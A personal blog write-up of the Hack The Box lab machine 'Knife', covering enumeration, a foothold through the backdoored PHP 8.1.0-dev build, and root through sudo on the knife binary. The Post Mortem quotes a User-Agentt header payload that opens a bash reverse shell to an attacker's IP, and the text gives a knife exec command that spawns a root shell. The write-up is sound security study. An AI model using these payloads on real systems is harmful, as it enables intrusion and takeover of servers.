---
title: "Knife HTB"
date: 2021-07-28T17:30:30
categories:
  - writeup
tags:
  - Linux
  - HacktheBox
  - Backdoor
  - GTFOBin
  - PHP
classes: wide
---
Knife was at the time of this writeup's completion an active box, meaning it is the first I managed to do without any write up help. It required a LOT of googling, but was overall not too hard. The basic flow of scan, google, foothold, `sudo -l` came through. I just needed to not make some silly mistakes and the whole process could have been less painful. There is a Post Mortem at the bottom containing of my thoughts when revisiting this box now it has retired. The main body of the writeup contains my thoughts at the time of completing the box.

<h2>Enumeration</h2>
**Nmap scan results:**

```
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
<h4>What is the scan telling us?</h4>

- Port 22 is open and running the usual ssh, specifically OpenSSH 8.2p1. Which seems to have some man in the middle(MitM) attack routes, but nothing suitable for this box. 
- Port 80 is showing Apache 2.4.41 which seems to have some vulns that can cause it to crash, but not much else. 
- Box is running on Ubuntu Linux which we knew already.

**Gobuster:**

```
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/server-status (Status: 403)
/index.php (Status: 200)
/icons (Status: 200)
/icons/small (Status: 200)
```

**Nikto:**

```
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2021-07-28 13:04:33 (GMT-4) (210 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

Navigating to the website we see a fancy looking Emergency medical site, but no obvious avenues of attack.

<h2>Foothold</h2>

After searching for hours about possible OpenSSH 8.2.p1 Ubuntu, 4ubuntu0.2, and Apache 2.4.41 CVE's. A closer look at Nikto holds the answer.
Nikto reveals that the Apache header shows that the PHP version is 8.1.0-dev. Googling this reveals an exploit on exploitdb: [EDB-ID:49933](https://www.exploit-db.com/exploits/49933). Which allows RCE through a backdoor added through a compromised git.php.net server. 

We download the python script from the exploitdb page and run it with python3. This gives us a shell as "james" and we find the user flag in their home directory.


<h2>Privilege Escalation</h2>

After obtaining the user flag, running `sudo` -l shows that james can run:

```bash
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```
Googling this binary shows that "knife" is a part of a automation platform called "chef". Reading the [website](https://docs.chef.io/workstation/knife/) we see:

> *"The Chef Workstation includes other command line tools for interacting with Chef Infra. These include knife for interacting with the Chef Infra Server, and chef for interacting with your local chef code repository (chef-repo)."*

Reading the website we see a list of subcommands, including knife exec. This shows that knife can execute ruby commands. Further details can be seen from [GTFOBins](https://gtfobins.github.io/gtfobins/knife/) which shows that `knife exec -E 'exec "/bin/sh"'` will run a ruby script to execute /bin/sh and obtain us root shell.
Attempting to run `sudo knife exec -E 'exec "bin/sh"'` leads to an error. 

After a large amount of trial and error it turns out the command is returning error because the shell from the previous script is not a TTY shell. Attempts to upgrade this shell lead to a non-responsive shell, a proper php reverse shell usually has no problems being upgraded. Maybe there is a method to upgrade the other one I'm not sure about, maybe by backgrounding it? 
More googling shows that a [script for reverse shell](https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py) has already been written by the same exploitdb author. 

We download the script, enter the parameters it requests in the format we request, open an nc listener, and run the script. We catch a tty shell! Now with our better shell, running the `sudo knife exec -E 'exec "/bin/sh"'` command gives us a root shell.
Navigating to the root folder we find root.txt and inside it... the root flag!
 
<h4>For next time:</h4>

- More careful attention to enumeration would have saved a lot of time. Searchsploit everything!
- Make sure that you have full TeleTYpewriter(tty) shell. I couldn't execute the knife privesc command because I hadn't upgraded the shell. 

---

<h2> Post Mortem</h2>
Now that the box has retired I am revisiting this writeup to add some study notes.

Actually reading the exploit I used at the time I find a lot of useful information. 
From the words of the [blog](https://flast101.github.io/php-8.1.0-dev-backdoor-rce/) written by flast101:

>*"taking a look at the added line 370 where zend_eval_string function is called, the code actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on a website running this hijacked version of PHP. This line executes PHP code from within the useragent HTTP header, if the string starts with ‘zerodium’.
Zerodium is a Washington-based security firm that specializes in buying and selling zero-day vulnerabilities for a variety of operating systems and popular desktop and Web applications, including for PHP itself."*

Reading this it seems I could have gotten RCE manually by adding a system reverse shell one liner to the User-Agent after "zerodium" in burpsuite. This would have avoided the issues I had with trying to run the GTFOBins priv esc of `knife exec -E`. For the script to execute User-Agent must have two t's and the script must be after zerodium.
Ippsec shows this one line would look like: 

```
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/YOURIP/PORT 0>&1'")
```

Overall not too hard of a box, and was such a great feeling completing my first active box. 